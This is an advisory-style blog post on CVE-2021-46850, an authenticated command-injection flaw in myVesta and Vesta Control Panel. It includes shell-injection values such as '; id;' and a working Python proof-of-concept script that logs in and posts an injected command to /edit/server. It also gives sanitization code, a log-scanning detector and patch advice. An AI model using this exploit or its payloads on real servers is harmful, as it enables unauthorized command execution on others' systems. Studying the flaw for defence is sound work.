CVE-2021-46850 is a serious vulnerability found in the myVesta Control Panel (before version .9.8-26-43) and Vesta Control Panel (before version .9.8-26). This issue allows remote, authenticated admin users to run almost any Linux command on a server through a simple HTTP request. In this post, we’ll break down how the exploit works, show a simple proof-of-concept (PoC), provide links to original sources, and help you stay protected.
What’s the Problem?
Both control panels, widely used to manage web servers, failed to sanitize input in the v_sftp_license parameter when users POST to the /edit/server endpoint. This means that an admin user—once logged in—can sneak in malicious commands, and the server will naïvely run them as the web server user (often admin or even root!).
Digging Into the Exploit
Both myVesta and Vesta CP use PHP to handle backend logic. The developer omitted sanitization of the v_sftp_license variable before it reached a shell. Let's walk through a simplified attack:
Step 1. Log in as an admin
The attacker needs an admin account. (That’s why you should never share or reuse admin credentials!)
Step 2. Craft a Poisoned POST Request
The attacker sends a POST request to /edit/server with a deliberately malicious value for v_sftp_license, where command separators are used to inject arbitrary shell commands.
Example
If I want to run id (show the user running the web server), I set v_sftp_license to something like:
; id;
The web server executes this as a shell command—right after whatever it usually does!
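The root cause described above is the classic command-injection pattern: a request parameter is spliced into a shell command string, so shell separators in the value become new commands. The following is an added example, not code from the page or from the Vesta/myVesta projects, showing that pattern beside the two defensive forms a maintainer would use: reject values containing shell metacharacters, and pass the value as its own argv element (or `shlex.quote` it) so no shell ever parses it. The backend script name `some-backend-script` is a hypothetical placeholder; the sample value is constructed.

```python
import shlex
import subprocess

# Constructed sample value of the kind discussed above.
SAMPLE_VALUE = "; id;"

# Characters that let a value escape from a shell command string.
SHELL_META = set(';&|`$<>(){}\n\\"\'')


def build_command_unsafe(license_value: str) -> str:
    # Hypothetical illustration of the vulnerable pattern: the raw parameter is
    # interpolated into a command string that is later handed to a shell.
    # This function only builds the string; it never executes anything.
    return f"some-backend-script {license_value}"


def is_safe_license_value(value: str) -> bool:
    # Allow-list style check: a licence value should never need shell syntax.
    return not any(ch in SHELL_META for ch in value)


def quote_for_shell(value: str) -> str:
    # If a shell string is unavoidable, shlex.quote turns the whole value into
    # a single-quoted literal, so "; id;" is passed as data, not as commands.
    return shlex.quote(value)


def run_safely(value: str) -> str:
    # Preferred fix: pass the value as one argv element with shell=False.
    # `echo` stands in for the backend script; the separators are echoed back
    # verbatim instead of being interpreted.
    result = subprocess.run(["echo", value], capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print("unsafe string :", build_command_unsafe(SAMPLE_VALUE))
    print("validator     :", is_safe_license_value(SAMPLE_VALUE))
    print("quoted        :", quote_for_shell(SAMPLE_VALUE))
    print("argv result   :", run_safely(SAMPLE_VALUE).rstrip())
```

Validation and argv-style invocation are complementary: the validator stops bad values at the boundary with a clear error, while `shell=False` guarantees that even a value that slips past a weak check cannot change which program runs.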
Here's a simple Python script using requests to exploit the vulnerability:

```python
import requests

# Change these according to your setup
HOST = 'https://your-vesta-server.com'
USERNAME = 'admin'
PASSWORD = 'admin123'

# Start session and authenticate
session = requests.Session()

# Log into Vesta CP (simulate login form post)
login_data = {
    'user': USERNAME,
    'password': PASSWORD,
    'login': ''  # Vesta might require extra POST fields
}
r = session.post(f'{HOST}/login/', data=login_data)

# Malicious payload: run 'id' and save to /tmp/pwned.txt
payload = '; id > /tmp/pwned.txt;'

# Send attack request
exploit_data = {
    'v_sftp_license': payload,
    # include other necessary POST fields, if required
}
exploit_url = f'{HOST}/edit/server'
response = session.post(exploit_url, data=exploit_data)

if response.ok:
    print('Exploit sent! Check /tmp/pwned.txt on server.')
else:
    print('Exploit failed. Status:', response.status_code)
```
After running this, any command in payload will execute on the server—confirm by opening /tmp/pwned.txt.
Attacker must be logged in as admin.
Compromise another account first, or abuse reused/weak passwords.
How Can You Protect Yourself?
1. Update your Vesta/myVesta Control Panel!
   - myVesta: https://github.com/myvesta/vesta/releases
   - Vesta: https://github.com/serghey-rodin/vesta/releases
2. Only let trusted IPs access the control panel.
3. Monitor logs for suspicious POSTs to /edit/server.
4. Change default passwords and review all user accounts.
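Steps 2 and 3 can be combined into a simple log check. The following is an added example, not part of the original post, that parses access-log lines in the Apache/nginx "combined" format and flags POSTs to /edit/server that come from an IP outside a trusted allow-list, carry a non-browser user agent, or lack a referer. The log lines, the trusted-IP set and the hostname are all constructed for the example.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Oct/2022:14:10:01 +0000] "GET /list/user/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Oct/2022:14:10:07 +0000] "POST /edit/server HTTP/1.1" 302 0 "https://panel.example/edit/server" "Mozilla/5.0"
198.51.100.9 - - [24/Oct/2022:14:11:30 +0000] "POST /edit/server HTTP/1.1" 200 4201 "-" "python-requests/2.28.1"
198.51.100.9 - - [24/Oct/2022:14:11:31 +0000] "POST /edit/server HTTP/1.1" 200 4201 "-" "python-requests/2.28.1"
192.0.2.44 - - [24/Oct/2022:14:12:00 +0000] "POST /login/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed allow-list of addresses that legitimately administer the panel.
TRUSTED_IPS = {"203.0.113.5"}


def parse_line(line):
    # Return a dict of the named fields, or None for lines that do not match.
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious_edit_server_posts(log_text, trusted_ips=TRUSTED_IPS):
    # Flag POSTs to /edit/server that look unlike an admin working from a browser.
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or not rec["path"].startswith("/edit/server"):
            continue
        reasons = []
        if rec["ip"] not in trusted_ips:
            reasons.append("untrusted source IP")
        if not rec["ua"].startswith("Mozilla/"):
            reasons.append("non-browser user agent")
        if rec["referer"] == "-":
            reasons.append("missing referer")
        if reasons:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "reasons": reasons})
    return hits


def count_by_ip(hits):
    # Aggregate flagged requests per source address for quick triage.
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for h in find_suspicious_edit_server_posts(SAMPLE_LOG):
        print(h["ts"], h["ip"], ", ".join(h["reasons"]))
    print(count_by_ip(find_suspicious_edit_server_posts(SAMPLE_LOG)))
```

Access logs do not record the POST body, so the v_sftp_license value itself is not visible here; this check works on request-level signals only. To inspect the parameter value you need a web application firewall or audit log that captures request bodies, and on the host side a spawned shell from the web server user on an audit trail such as auditd is the complementary signal.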
References and Further Reading
- NVD – CVE-2021-46850
- Original myVesta Security Advisory
- Exploit Database (EDB-ID: 51036)
Conclusion
CVE-2021-46850 is a classic but dangerous example of command injection in modern server control panels. If you use myVesta or Vesta Control Panel, upgrade _immediately_ and make sure your admin areas are tightly secured. This exploit, while requiring admin access, can turn one small mistake into a full server breach.
Stay patched, and always sanitize your inputs!
_Disclaimer: This post is for educational purposes only. Do not test on servers you do not own or have explicit authorization to audit._
Timeline
Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/25/2022 14:43:00 UTC